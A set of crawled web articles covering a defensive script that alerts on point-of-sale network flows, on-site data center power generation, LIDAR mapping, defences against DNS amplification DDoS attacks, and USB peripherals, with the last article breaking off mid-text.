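                dst = ipaddress.ip_address(row["dst_ip"])
                if src in POS_SUBNET and not dst.is_private \
                        and str(dst) not in APPROVED_DESTINATIONS:
                    yield row

    if __name__ == "__main__":
        for flow in suspicious_flows("flows.csv"):
            print("ALERT: POS host", flow["src_ip"], "contacted", flow["dst_ip"],
                  "-", flow["bytes"], "bytes")

In practice the same logic would run against data from a flow collector rather than a CSV, but the profiling idea is the same: know what a POS machine is supposed to talk to, and alarm on anything else.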
<urn:uuid:759557fe-116c-4e03-97ca-851280406907>
CC-MAIN-2017-04
http://www.ioti.com/security/10-most-vulnerable-iot-security-targets
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284429.99/warc/CC-MAIN-20170116095124-00149-ip-10-171-10-70.ec2.internal.warc.gz
en
0.960166
5,433
2.5625
3
Energy is the lifeblood of data centers, and as it becomes scarcer and as its cost increases, more companies will consider the feasibility of generating their own power. Although the perceived benefits of on-site power generation—especially with renewable sources like wind and solar—are tempting, the decision to pursue either supplemental or exclusive generation is one that must be made carefully. Why Would a Company Want to Generate Its Own Power? When was the last time your power rate went down? If you’re like most consumers and companies in the U.S. and elsewhere, the answer is either “never” or “I don’t recall.” The increase in energy prices is attributable to a number of factors in the U.S., not the least of which is a spendthrift federal government whose money printing is debasing the value of the dollar. And with few prospects of a reversal of this trend, prices will likely continue to increase, barring an unexpected deflationary event (which the Federal Reserve would likely fight by printing even more money). Another factor is increasing demand worldwide, especially in emerging economies like China and India. Data centers are facing increasing demand for their services, and to meet this demand, they must collectively consume even greater amounts of power. Although energy-efficiency measures are important and should be pursued for both fiscal and environmental reasons, ultimately, they cannot by themselves balance the increasing need for power to meet demand. As the cost of operating (i.e., powering) servers over their lifetimes nears the initial capital cost of purchasing them, energy is quickly becoming the greatest expense that companies face for their data centers. So, what appeal would a company see in generating its own power? If the power comes from a renewable source like solar or wind energy, then the benefits are obvious. These sources contain abundant energy, and tapping them produces less in the way of emissions and other waste products (although manufacturing the equipment poses its own environmental problems). What’s more, they’re free—if you have the equipment to convert them to electricity. Another concern for companies is the need for reliable, high-quality power. Power spikes and other power events can cause service outages and equipment damage in the data center, and the broader power grid is unable to mitigate all such events. Thus, although purchasing power from a utility is simpler in some ways (for instance, it requires essentially nothing in capital costs compared with on-site power generation), it is less than ideal. If one considers the need for UPS and other systems to “clean up” the power produced by utilities, then the capital costs of relying on a utility are really much more than nil. And, of course, some companies may wish to control their own destinies as much as possible. With on-site power generation, a company need not rely on the utility company to respond in the event of a power failure or to explain why rates are going up yet again. The thought of each company (or even just many companies) meeting its own power needs—especially by way of solar, wind or similar renewable sources—sounds really neat. So, when do we get started? Well, after considering the downsides first. On-Site Power: Reversing the Trend of the Last Century The power grid, a network for distributing power to companies and consumers from central power-generation sources, ameliorated a number of difficulties when it was implemented. 
First, it allowed companies to purchase power instead of having to generate it themselves, enabling these companies to focus on their core business rather than more peripheral matters. Second, it exploited economies of scale by centralizing power generation in fewer, larger locations, rather than a scattering of individual plants. These centralized facilities were able to distribute power to a large number of customers rather than servicing a single company. But the 21st century is seeing something of a reversal of this trend of centralization as power generation goes from a centralized model to more of a hybrid model that relies on greater distribution of power-generation sources. This change involves both consumers and companies, and in many cases, it supplements the power grid (i.e., these smaller sources are integrated into the grid rather than isolated for service to a single location—unused power is sold to the utility and can be used by other customers). Although centralized sources of energy will likely remain the “bread and butter” of electricity pending development of some revolutionary new type of power generation technology, an increase in distributed sources will ease the burden on these larger facilities and may help improve the quality of power locally. For many data centers that are considering on-site power generation, the hybrid approach is likely the best option. Generating all of their own power needs on site is a tall order, and the capital costs of doing so may be too much for small data centers (even though their power needs are less than those of large data centers). A few large companies, and perhaps even fewer smaller ones, may be able to pursue such a large-scale project; most, however, will likely opt for a supplemental approach. On-site power generation will reduce—not eliminate—reliance on the utility company. What Are the Options? The options for on-site power generation that likely come to mind first are solar and wind energy. These sources are universally available—everywhere is illuminated by the sun, and the wind always blows sometimes, at least—making them universally accessible. What’s more, they’re free, except for the capital cost of converting them to electricity and integrating the generated power into the existing infrastructure. But companies have other options as well, some more or less complicated and expensive than others. One of the advantages of solar power is its availability, but it has a striking disadvantage: it is only available for roughly half the day. The solar constant (the amount of electromagnetic radiation incident on the Earth) is approximately 130 watts per square foot. A solar panel, assuming it is 100% efficient for all wavelengths (which is not nearly the case), would have to be nearly 16 square feet to generate an average of one kilowatt of power over the course of a day (including night, when no solar power is generated). Furthermore, this assumes that the panels adjust to maintain the optimum angle with the sun over the entire course of the daytime hours and that weather conditions do not hinder the sun from reaching them. These are many “ifs,” and clearly the amount of power a solar panel can generate is much lower than the extremely optimistic numbers above. Even assuming these numbers are feasible, a megawatt of power would require over a third of an acre of solar panel space—to say nothing about the space in between individual panels. 
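For readers who want to check the back-of-the-envelope figures above, the arithmetic can be sketched as follows. The 50 percent daylight factor, perfect tracking, and loss-free conversion are the same idealized assumptions used in the text, so these are best-case numbers.

    # Reproduces the idealized estimate above: 130 W/sq ft while the sun shines,
    # perfect tracking, roughly half of each day in daylight, 100% panel efficiency.
    SOLAR_CONSTANT_W_PER_SQFT = 130.0
    DAYLIGHT_FRACTION = 0.5            # averages generation over day and night
    SQFT_PER_ACRE = 43_560.0

    avg_w_per_sqft = SOLAR_CONSTANT_W_PER_SQFT * DAYLIGHT_FRACTION   # 65 W/sq ft
    sqft_per_avg_kw = 1_000.0 / avg_w_per_sqft                       # ~15.4 sq ft
    acres_per_avg_mw = sqft_per_avg_kw * 1_000.0 / SQFT_PER_ACRE     # ~0.35 acre

    print(f"{sqft_per_avg_kw:.1f} sq ft per average kW")    # ~15.4, i.e. "nearly 16"
    print(f"{acres_per_avg_mw:.2f} acres per average MW")   # ~0.35, "over a third"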
Factoring in the inefficiencies of the panels and other considerations, the required area quickly multiplies. Furthermore, complete reliance on solar energy would require energy storage infrastructure—in other words, some kind of battery system to provide power at night. Solar energy is therefore better used as a supplement rather than an exclusive power source. IT resources are generally most in demand during the day, so solar power infrastructure can help reduce peak power consumption. In cases where power rates increase during times of peak usage or when a customer exceeds some usage level, the use of solar power can yield tremendous savings beyond just the typical cost of power. Wind energy offers similar advantages and disadvantages compared with solar. Like solar, wind energy depends on conditions: wind speed, for instance. In addition, however, robust structures for mounting the windmills and turbines are required, whereas solar panels can be placed at ground level or mounted to existing buildings or other structures. Large wind turbines require open space for construction of the supporting structures and to allow access to strong winds. Although wind, like solar, does not generate emissions, some concerns have arisen regarding their effects on wildlife—particularly birds, which can be killed by the rotating blades. A less noticeable effect is the mining of rare earth elements to create the magnets that allow the turbines to convert energy of motion into electricity. Most of the production of these elements takes place in China, and a lack of environmental regulations in that country have led to tremendous pollution problems. (See a blog post entitled “Isn’t It Ironic: Green Tech Relies on Dirty Mining in China.”) Two other alternatives are fuel cells and natural gas. Natural gas—particularly when readily available, as in the case of the Reno Technology Park (“An Example of Data Center Site Selection: Reno Technology Park”)—is a relatively clean-burning fuel that can be supplied to on-site generation infrastructure to power a data center or other commercial facility. Fuel cells offer a similar (but even cleaner) possibility, although some questions revolve around their safety. Another striking technology that has significant potential is the use of micro nuclear generators, such as that under development by Hyperion Power Generation. These small power plants could be delivered via truck and supply power without refueling for years—even up to a decade. Numerous safeguards are designed to ensure the safety of the product. With proper waste handling, nuclear power—especially in the contained vessels used by Hyperion—can be a very clean alternative to traditional coal power. This type of small but powerful electricity generation technology offers an exciting possibility for companies in the near future. A different alternative is so-called combined heat and power (sometimes called cogeneration). In this case, waste heat left over from power generation is used to, for instance, provide on-site heat, thereby saving the expense of converting generated electricity back into heat elsewhere, or of needing to purchase a separate fuel for heat generation. The Problem of Location Alternative power-generation technologies many times—although not always—face a difficulty with regard to location. Often, prime locations for data centers (such as in cities, where infrastructure, talent pools and other resources are readily available) lack the power capacity for adding large, power-hungry facilities. 
It is precisely here that supplemental power generation can be of great value; nevertheless, space for wind turbines (for instance) is highly limited or absent. Even solar power has limited potential in such locations owing to a lack of affordable space. On the other hand, remote locations where utility-based power may be more available (owing to less concentrated demand) leave more open space for power-generating infrastructure, but these locations may also be less desirable. A lack of local talent and potentially the need to travel long distances from a company’s headquarters to a data center facility may make such a possibility far less appealing despite its greater capacity for supplementary (or exclusive) power generation. Who Should Generate On-Site Power? Despite its tremendous potential benefits, generating power onsite has a number of glaring drawbacks (some of which are mentioned above), not the least of which is the initial capital cost of installing the needed infrastructure. Of course, smaller companies with smaller data centers may need less power to operate their facilities compared with larger companies, but even speaking proportionally, these companies may be in a poorer position to shell out the startup capital needed to fund such a project. Large companies, although their data centers may require vastly larger amounts of power, may be more capable of producing the necessary capital to implement a large solar array or a number of wind turbines. And, of course, the costs for generating power on site will vary greatly. Does your company need to purchase additional space for solar panels or windmills? How much power capacity do you need? Do you plan on using a battery storage system for excess power generated? Will you need to hire additional staff to support the infrastructure? The answers to such questions can vary significantly depending on the particular company’s needs and expectations for its power system. The type of system and its infrastructure and ongoing costs (typically maintenance for renewable energy sources) will certainly affect the speed with which the company recoups its investment. Generating your own power for your data center is not something that should be jumped into lightly. To be sure, the startup costs will deter many businesses, but in taking steps in this direction, a company should be sure that it wants to add a new set of tasks to its work. Establishing power-generation capabilities means that a company is doing something other than its core business function, and even though the equipment, personnel and maintenance of such a system may be affordable, the distraction could potentially harm business. Thus, a company must consider a variety of factors when choosing whether to pursue on-site power generation to support or supplement its data center. The potential return on investment for on-site power generation depends on a variety of factors, and giving a single number to quantify it would be deceiving. Not every company need consider on-site generation—including even some of those companies that could afford it. In some cases, the best policy is for a company to focus on its core business and let the utility companies focus on theirs: power generation. But with the rising cost of electricity and the growing appetite of data centers for power, the expenses of running an IT operation could eventually reach a tipping point for some companies, thereby making on-site power generation—whether exclusive or supplemental—feasible or even desirable. 
The history of power generation and distribution is one of consolidation into a few centralized generation facilities that distribute power to consumers, but the interest in distributed power generation—whereby more consumers (corporate and residential) produce smaller amounts of power—offers some resistance to this trend. Distributed sources cannot exploit the economies of scale that larger facilities can, but they offer certain advantages, particularly in the case of companies that need high-quality power. In addition, distributed power generation offers both individuals and companies with sufficient capital an opportunity to help the environment by generating clean power (in the case of solar, wind and even nuclear energy, for example). For companies operating data centers, location may be a significant stumbling block to their ability to generate power onsite. More desirable locations—such as urban centers—generally leave less room for power-generation infrastructure, whereas less desirable locations have more room but do not offer the benefits of, say, urban centers. Article originally posted July 2011 Photo courtesy of www.francehousehunt.com
<urn:uuid:9420edd0-491a-4601-bc7b-d9aaa6ade5a8>
CC-MAIN-2017-04
http://www.datacenterjournal.com/should-i-be-generating-my-own-power-for-my-data-center/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279915.8/warc/CC-MAIN-20170116095119-00545-ip-10-171-10-70.ec2.internal.warc.gz
en
0.948918
2,924
2.765625
3
LIDAR mapping projects explore the fourth dimension - By Patrick Marshall - Mar 14, 2013 Project managers appear to be in consensus about the lessons learned from the first generation of light detection and ranging (LIDAR) mapping, which uses the data gathered from bounced light to create detailed, 3D maps. For one thing, it’s not just three-dimensional. The impacts of man and nature cause changes in topography, including underwater topography. So it's important to rescan periodically, to see how things have changed across the fourth dimension, time. What's more, since the hardware and software continues to improve, and since agencies have come to realize the value of the data, rescans are even more in demand. "We started our collection in 2007, flying at 8,000 feet," said Charles Fritz, director of the International Water Institute, which runs the Red River Basin Decision Information Network. The RRBDIN is mapping chunks of North Dakota, Minnesota and central Canada. "Our spec was we wanted at least one ground point every 1.4 meters of landscape at plus or minus 15 centimeters. With the new technology we can easily get 10 or 11 points per square meter. Think of it as putting on a better and better pair of cheater glasses." The U.S. Army Corps of Engineers currently is on its second LIDAR data-gathering effort covering the nation's shorelines, and has seen how improved technology has broadened the scope of the project. Infrastructure inspections via LIDAR The Army Corps of Engineers manages over 1,000 coastal navigation structures, such as the Kaumalapau Harbor breakwater in Hawaii (pictured above). General monitoring techniques include lidar or photogrammetric surveys, bathymetric sonar surveys, conventional ground surveys, walking inspections, and damage surveys that are more comprehensive than typical field inspections, according to the Corps' Costal and Hydraulics Laboratory. The data is compared to historical data and to standard design methods in order to improve designs. Employing both topographic and bathymetric (working under water) LIDAR in aircraft, the Corp's National Coastal Mapping Program scans the shoreline — including Hawaii, Alaska and the Great Lakes — in a swath 500 meters inland and 1,000 meters offshore. At current funding levels, the team can cover the entire shoreline every five to six years. Chris Macon, technical lead for program, said that the primary purpose of the program has been to track the movement of sand to ensure safe navigation of the country's waterways. "We're finding out how much sand there is, where it is, where is it moving to along the coast and how it is impacting federal navigation projects," Macon said. The airborne bathymetric LIDAR delivers 25-30 centimeters of vertical accuracy, and its maximum penetration is roughly 50 meters in crystal-clear waters, he said. Navigation issues are still the priority, but as LIDAR scanning and analysis has gotten more accurate and applications have proliferated, federal, state and local agencies are asking for more coverage inland. "As our capabilities have grown, adding topographic LIDAR, adding true color imagery and adding hyperspectral imagery, people want more coverage inland," Macon said. In addition to navigation issues, he said, the data is being employed for invasive species mapping, impacts on wetlands and post-hurricane assessments. Beyond collecting better data, LIDAR pioneers agree on the importance of educating and working closely with those who can make the best use of the LIDAR data. 
"We spend a lot of time talking with our local stakeholders and developing relationships with people throughout the state, letting people know when flights are happening, who can gain from them," said John English, LIDAR data coordinator for Oregon's Department of Geology. "We travel throughout the state on a regular basis, giving presentations and talking about the technology. It's going out to local constituents in different places with different needs and concerns and addressing them directly." Finally, implementers agree that right now the pressing need is for more applications that can make effective use of the data that has already been collected. "The sensor technology to collect the data has reached a point where we have very dense data,” Macon said. "Some people can use the point data and go drive their own products and information from it, but a lot of people don't want to have to do all the analysis and digging into the data to get the information out. That's where we try to help evolve products and provide more information to the users." PREVIOUS: When LIDAR came down to Earth, mapping projects took off NEXT: LIDAR-equipped robots map a city’s interior.
<urn:uuid:efab7f54-1a2a-489f-8ed1-9e4af4ba921d>
CC-MAIN-2017-04
https://gcn.com/articles/2013/03/14/lidar-mapping-explores-fourth-dimension.aspx
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282932.75/warc/CC-MAIN-20170116095122-00085-ip-10-171-10-70.ec2.internal.warc.gz
en
0.94692
988
2.6875
3
According to a recent Arbor Networks report on infrastructure security, the number of DDoS attacks on enterprise DNS servers is on the rise but, despite this, many businesses aren’t taking the steps necessary to protect this vital part of their IT infrastructure. Indeed, while an increasing number of companies experienced customer-impacting DDoS attacks on their DNS servers last year, few businesses admitted to taking formal responsibility for DNS security somewhere within their organization. Additionally, Cisco’s 2014 Annual Security Report reveals how its threat intelligence experts found evidence of corporate networks being misused or compromised in every single case they examined during a recent project on DNS lookups.

It’s clear, then, that DNS-based DDoS attacks are a growing threat, and one that’s being neglected by businesses when DNS security should really be seen as a priority because of the increasing risks. But how exactly do these attacks work? And what can businesses do to protect against them?

It’s surprisingly simple to generate a DDoS attack using an enterprise’s DNS infrastructure. Rather than using their own IP address, attackers send queries to name servers across the internet from a spoofed IP address of their target, and the name servers, in turn, then send back responses. If these responses were around the same size as the queries themselves, this course of action in itself wouldn’t be sufficient to wreak the desired havoc on the target. What’s required is amplification of each of these queries so that they generate a very large response, which, since the adoption of DNS security extensions (DNSSEC) and their inherent cryptographic keys and digital signatures, has become increasingly common.

A query of just 44 bytes, for example, sent from a spoofed IP address to a domain that contains DNSSEC records, could return a response of over 4,000 bytes. With a 1 Mbps internet connection, an attacker could send in the region of 2,840 44-byte queries per second, which would result in replies on the order of 93 Mbps being returned to the target server. And, by using a botnet of thousands of computers, the attacker could quickly recruit 10 accomplices and deliver 1 Gbps of replies to begin incapacitating their target.

Most name servers can be modified to recognize that they’re repeatedly being queried for the same data from the same IP address. Open recursive servers, however, of which there are estimated to be around 33 million around the world, will accept the same query from the same spoofed IP address again and again, each time sending back responses such as the DNSSEC examples mentioned above.

Recognition and prevention

So what steps can companies take to combat such attacks? Perhaps most important is learning to recognize when an attack is taking place. Many organizations don’t know what their query load is, so they aren’t even aware of when they’re under attack. By using the statistics support built into the DNS software BIND, administrators can analyze their data for query rates, socket errors and other attack indicators. Even if it’s not clear exactly what an attack looks like, monitoring DNS statistics will establish a baseline from which trends and anomalies can quickly be identified.

An organization’s internet-facing infrastructure should also be scrutinized for single points of failure, not only in external authoritative name servers, but also in switch and router interactions, firewalls, and connections to the Internet.
Once identified, the business should then consider whether these vulnerabilities can be effectively eliminated. External authoritative name servers should be broadly geographically distributed wherever possible, which will not only help to avoid single points of failure, but will also provide the added advantage of improving response-time performance for their closest customers. And, in the face of the huge number of responses resulting from a DDoS attack, it’s worth considering overprovisioning existing infrastructure, a process that is both inexpensive and easy to trial prior to an incident.

Cloud-based DNS providers run name servers of their own in data centers around the world. These can be configured as secondaries for an organization’s own, with data loaded from a master name server designated and managed in-house. It’s worth noting, though, that most of these providers bill for the number of queries received, which will of course increase significantly during a DNS attack.

As well as configuring their DNS infrastructures to resist DDoS attacks, organizations should also ensure they don’t become unwitting accomplices in DDoS attacks against others. Unless the company is one of the very few that runs an open recursive name server, it can limit DNS queries to those IP addresses on its internal networks, thereby making sure that only authorized users have access to its recursive name servers. And for those that run authoritative name servers, Response Rate Limiting (RRL), incorporated into BIND name servers, makes it difficult for attackers to amplify queries, stopping responses being sent to a single IP address at any rate higher than a pre-programmed threshold.

By understanding how DDoS attacks exploit DNS servers, and recognizing the signs, organizations can take measures to lower the threat to their own infrastructure, and avoid becoming complicit in attacks on others.
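As a rough illustration of the amplification arithmetic described earlier in this piece, the following sketch reproduces the article’s figures. Actual query and response sizes vary with the record types queried and the DNSSEC key lengths in use, so treat these as order-of-magnitude numbers.

    # Rough model of DNS amplification using the figures cited above.
    QUERY_BYTES = 44
    RESPONSE_BYTES = 4_000
    ATTACKER_UPLINK_BPS = 1_000_000          # 1 Mbps of spoofed queries per node
    BOTNET_NODES = 10

    queries_per_second = ATTACKER_UPLINK_BPS / (QUERY_BYTES * 8)      # ~2,840
    reply_mbps = queries_per_second * RESPONSE_BYTES * 8 / 1_000_000  # ~91 Mbps
    amplification = RESPONSE_BYTES / QUERY_BYTES                      # ~90x

    print(f"{queries_per_second:,.0f} queries/s per node")
    # roughly the ~93 Mbps figure cited in the article
    print(f"~{reply_mbps:.0f} Mbps of responses per node ({amplification:.0f}x amplification)")
    print(f"~{reply_mbps * BOTNET_NODES / 1000:.1f} Gbps from {BOTNET_NODES} nodes")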
<urn:uuid:22a46079-7c92-4def-ade4-6af4ab54daa0>
CC-MAIN-2017-04
https://www.helpnetsecurity.com/2014/02/13/doing-more-to-protect-your-dns-from-ddos/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282932.75/warc/CC-MAIN-20170116095122-00085-ip-10-171-10-70.ec2.internal.warc.gz
en
0.944911
1,065
2.625
3
Santandrea S., European Space Agency | Gantois K., European Space Agency | Strauch K., European Space Agency | Teston F., European Space Agency | And 6 more authors.

Solar Physics | Year: 2013

Within the European Space Agency's (ESA) General Support and Technology Programme (GSTP), the Project for On-Board Autonomy (PROBA) missions provide a platform for in-orbit technology demonstration. Besides the technology demonstration goal, the satellites also provide services to, e.g., scientific communities. PROBA1 has been providing multi-spectral imaging data to the Earth observation community for a decade, and PROBA2 provides imaging and irradiance data from our Sun to the solar community. This article gives an overview of the PROBA2 mission history and provides an introduction to the flight segment, the ground segment, and the payload operated onboard. Important aspects of the satellite's design, including onboard software autonomy and the functionality of the navigation and guidance, are discussed. PROBA2 proved again within the GSTP concept that it is possible to deliver a fast and cost-efficient satellite design and to combine advanced technology objectives from industry with focussed objectives from the science community. © 2013 Springer Science+Business Media Dordrecht.
<urn:uuid:1260d36b-4ee5-4abf-ae53-c53dabf8e80e>
CC-MAIN-2017-04
https://www.linknovate.com/affiliation/directorate-of-human-spaceflight-and-operations-939125/all/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279189.36/warc/CC-MAIN-20170116095119-00326-ip-10-171-10-70.ec2.internal.warc.gz
en
0.848166
264
2.828125
3
While it is easy to identify areas in which RIM and IT have common purpose and common goals, it is often much more difficult to ensure that the partnership is effective. The following activities will facilitate a true collaborative relationship.

Establish a shared language - One area of difficulty is the language we use to describe what we do. The words may be the same, but point to entirely different meanings. For example, in RIM, the word record is defined as recorded information, regardless of medium or characteristics, made or received by an organization, that is evidence of its operations and has value requiring its retention for a specific period of time. But, for the IT professional, a record refers to a complete set of information and is generally composed of fields of information. Similarly, the word archive has distinct meanings for each profession. For RIM, the term refers to documents created or received by a person or organization and preserved because of their continuing value, often also referred to as historical value. For the IT professional, it is much more common to think of archive as a process of compressing and copying files to a long-term storage medium. Take time to make sure that everyone on the RIM/IT team has the same understanding of the terms being used in their work together. Does everyone understand what a backup is and what it is used for? Does everyone understand the difference between backups and long-term retention? Does everyone understand information lifecycle management and how it might differ from the records lifecycle?

Understand the goals of electronic records management - RIM's primary responsibility is to ensure that a system which captures and receives records can also preserve required record characteristics. This is particularly important since the vast majority of records are now born digital or converted into electronic formats.

Ensure electronic records meet tests of evidence - ISO 15489-1, Information and documentation - Records management - Part 1: General, outlines four tests that must be met for a record to meet the test of evidence. Those characteristics are authenticity, reliability, integrity, and usability. Other international and national-level standards address various elements of ensuring the tests of evidence can be met through the capture and retention of metadata, controlled processes for records conversion and migration, and the integration of various technologies (e.g., electronic document management systems, electronic records management systems, cloud computing, SaaS, etc.).

Capture metadata specific to records management actions - RIM-related metadata aids in the implementation of the organization's information processing activities and records management policies. Proper recordkeeping metadata ensures that records are retrievable, are properly handled throughout the records lifecycle, and assists in maintaining the integrity and authenticity of records.

Ensure accessibility of records throughout the lifecycle - ISO 15489-1 makes clear that accessibility to records must be assured throughout the lifecycle of the record. The standard does not preclude organizations from transferring records to nearline or offline storage, but it does require that the records be retrievable and usable throughout their defined records lifecycle. It is a joint responsibility of RIM and IT to ensure that the systems in use provide the necessary levels of protection for personal privacy and corporate information. Methods should be implemented to prevent unauthorized access, tampering, or disposal.
Manage disposition of electronic records - Effective recordkeeping programs enforce a records disposition schedule that defines the necessary retention times for various categories of records. Disposition occurs when the pre-determined time period has passed between the creation or capture of a record and the endpoint (date) specified in the retention schedule. In North America, the term disposition may mean permanent transfer of a record to an historical archive or permanent destruction of the record. Once the disposition is complete, it is important to create an audit trail of the disposition actions taken and the authority on which they are based.

By now it is clear that the roles of RIM and IT professionals converge throughout the information lifecycle. Decisions made by these professionals should align with the company's records management policies as based upon relevant laws, statutes, or regulations. No actions should be taken that would create unnecessary risk to the organization or would negatively impact the content, context, or integrity of the record. But beyond that, what are the key areas for RIM and IT collaboration?

To avoid the prospect of boiling the ocean, it is important for each organization to assess its unique areas of opportunity and vulnerability to determine the initial focus of the collaborative efforts. But most companies will benefit from first addressing the following areas.

Apply retention and disposition rules to electronic records - As we have seen, the requirements for information governance and compliance apply to all record formats. The organization's records retention and disposition policy identifies the length of time the organization will maintain its records. Retention periods will vary by type of record and may extend from a few months to many years, or even permanent retention for some types of records. Since email messages often contain record information, the systems in place for managing email must allow the application of the organization's retention and disposition policy as well.

IT and RIM must work together to develop the strategies and protocols that will ensure the organization's retention and disposition rules are followed for the vast array of electronic repositories, such as shared servers, transactional databases, data warehouses, ECM systems, document management systems, etc. Initial discussions between IT and RIM on this topic will likely lead to a need for developing a shared or complementary taxonomy which facilitates retrieval and disposition of records and information. RIM understands the records, the retention and disposition requirements, and how the business units use the information in their conduct of business. IT understands the capabilities and limitations of the systems and storage media in use, as well as the plans and implementation for technology upgrades. Both perspectives must be considered to result in effective records retention and disposition.
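As a simple illustration of how a retention schedule and a disposition audit trail might be applied to electronic records, consider the sketch below. The record categories, retention periods, and field names are invented for the example and are not a recommendation for any particular organization's schedule.

    # Illustrative only: compute a disposition date from a retention schedule
    # and build a minimal audit-trail entry for the disposition action.
    from datetime import date

    RETENTION_SCHEDULE_YEARS = {          # hypothetical categories and periods
        "accounts-payable": 7,
        "routine-correspondence": 2,
        "contracts": 10,
    }

    def disposition_date(record_category, capture_date):
        """End of the retention period for a record captured on capture_date
        (simplified year arithmetic; ignores leap-day edge cases)."""
        years = RETENTION_SCHEDULE_YEARS[record_category]
        return capture_date.replace(year=capture_date.year + years)

    def audit_entry(record_id, record_category, capture_date, action, authority):
        """Record what was done, when, and under what authority."""
        return {
            "record_id": record_id,
            "category": record_category,
            "captured": capture_date.isoformat(),
            "disposition_due": disposition_date(record_category, capture_date).isoformat(),
            "action": action,                 # e.g. "destroyed" or "transferred"
            "action_date": date.today().isoformat(),
            "authority": authority,           # retention schedule citation
        }

    print(audit_entry("INV-2009-0042", "accounts-payable", date(2009, 3, 31),
                      "destroyed", "Corporate Retention Schedule v4, item FIN-03"))

The point of the example is the shared vocabulary: RIM supplies the categories, periods, and authority citations; IT makes sure every repository can apply them and emit the audit record.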
<urn:uuid:1b7e510d-0eba-4d80-b61b-769c48e4a85b>
CC-MAIN-2017-04
http://www.cioupdate.com/reports/article.php/11050_3878916_3/strongSpecial-Reportstrong---IT146s-Critical-Partnership-with-Records-Management.htm
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283008.19/warc/CC-MAIN-20170116095123-00352-ip-10-171-10-70.ec2.internal.warc.gz
en
0.939395
1,167
3.171875
3
Port Numbers – How the Transport Layer Identifies Conversations

Computers today are equipped with a whole range of different applications. Almost all of these applications are able to communicate across the network in some way, using the Internet to send and receive information, fetch updates, or confirm a user's purchase. Consider that all of these applications may simultaneously be receiving and sending e-mail, instant messages, web pages, and VoIP phone calls. In this situation the computer is using one network connection to keep all of this communication running. But how is it possible that this computer is never confused about choosing the right application to receive a particular packet? We are talking about a computer that processes two or more communications at the same time for two or more running applications.
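A small illustration of the idea (assuming a host with internet access, and using example.com purely as a placeholder): two sockets opened from the same machine each receive their own ephemeral source port, and the transport layer keeps the conversations apart by the full combination of source IP, source port, destination IP, and destination port.

    # Sketch: two simultaneous client connections from the same host.
    # Each socket gets a distinct ephemeral source port, so replies are
    # delivered to the right application even over one network link.
    import socket

    web = socket.create_connection(("example.com", 80))    # placeholder host
    tls = socket.create_connection(("example.com", 443))

    for name, s in (("web", web), ("tls", tls)):
        src_ip, src_port = s.getsockname()[:2]
        dst_ip, dst_port = s.getpeername()[:2]
        print(f"{name}: {src_ip}:{src_port} -> {dst_ip}:{dst_port}")

    web.close()
    tls.close()

Running this prints two different source ports for the same source address, which is exactly the information the operating system uses to hand each incoming segment to the correct application.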
<urn:uuid:64fb3f3f-491f-4531-9f12-0ef730457bf5>
CC-MAIN-2017-04
https://howdoesinternetwork.com/tag/ports
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280133.2/warc/CC-MAIN-20170116095120-00078-ip-10-171-10-70.ec2.internal.warc.gz
en
0.925935
151
3.5625
4
NASA said today it would launch a spacecraft that would for the first time test fire green propellant technology in space. NASA's Green Propellant Infusion Mission (GPIM) will use a small satellite to test a hydroxyl ammonium nitrate fuel/oxidizer blend, developed by the Air Force Research Laboratory and also known as AF-M315E propellant. This fuel may replace the highly toxic hydrazine and complex bi-propellant systems in use today, NASA said. The green propulsion system will fly aboard a Ball Aerospace & Technologies Configurable Platform 100 satellite and is slated for launch on a SpaceX rocket in 2016.

Developed by the Air Force Research Laboratory, the green propellant is less harmful to the environment, increases fuel efficiency, and diminishes operational hazards. The propellant offers nearly 50% higher performance for a given propellant tank volume compared to a conventional hydrazine system, and the propulsion system will feature a catalyst technology pioneered by Aerojet Rocketdyne, NASA stated.

According to NASA: "Hydrazine is an efficient and ubiquitous propellant that can be stored for long periods of time, but is also highly corrosive and toxic. It is used extensively on commercial and defense department satellites as well as for NASA science and exploration missions. NASA is looking for an alternative that decreases environmental hazards and pollutants, has fewer operational hazards and shortens rocket launch processing times."
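One way to see where the "nearly 50% higher performance for a given tank volume" figure comes from is to compare density-specific impulse, that is, propellant density multiplied by specific impulse. The density and specific-impulse numbers below are approximate ballpark values chosen only to illustrate the calculation; they are not official mission or program figures.

    # Very rough illustration: total impulse from a fixed tank volume scales
    # with (propellant density) x (specific impulse). Values are approximate.
    HYDRAZINE = {"density_g_per_cc": 1.02, "isp_s": 235}   # assumed typical monopropellant values
    AF_M315E  = {"density_g_per_cc": 1.47, "isp_s": 245}   # assumed representative values

    def density_impulse(prop):
        return prop["density_g_per_cc"] * prop["isp_s"]

    gain = density_impulse(AF_M315E) / density_impulse(HYDRAZINE) - 1.0
    print(f"~{gain:.0%} more impulse per unit of tank volume")   # on the order of the ~50% quoted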
<urn:uuid:31eafe69-20ad-40b1-894c-b2f4fdb3a5ab>
CC-MAIN-2017-04
http://www.networkworld.com/article/2466565/security0/nasa-s-green-rocket-fuel-set-for-major-space-test.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280483.83/warc/CC-MAIN-20170116095120-00564-ip-10-171-10-70.ec2.internal.warc.gz
en
0.919628
299
3.21875
3
Cool Tools: USB Desktop Peripherals and Devices This month, we depart from our normal coverage of key IT technologies to focus on how interesting devices are plugging into business and home desktops nowadays. Let’s explore the many kinds of accessories and gadgets that the Universal Serial Bus (USB) makes possible for modern desktop PCs, notebooks and laptops. Though there are many built-in interfaces that also work to link computers to all kinds of hardware—such as older interfaces like RS-232, parallel printer connections and various forms of slower serial interfaces for a mouse and keyboard—USB has zoomed to the top of the list of most popular standard interfaces. Today, you’ll find it used for everything from mouse and keyboard links to outboard hard disks, network interfaces, so-called pen drives (which use USB and a flash memory card to store data) and more. Basically, USB is a plug-and-play interface that enables computers to recognize and establish links to add-on devices, such as audio players, pointing devices (not just mice, but trackballs, joysticks and so forth), keyboards, scanners, printers, telephones and many types of storage devices. Because USB device drivers know how to register and describe the devices they service to the computers to which they attach, you can usually plug in a new device without requiring a special adapter card or driver software to enable the PC and the device to acknowledge each other. The USB standard resulted from a joint development project that involved vendors like Compaq, HP, IBM, Lucent, Intel, Microsoft, Philips and NEC. This technology is freely available to computer and device vendors, so they can leverage existing 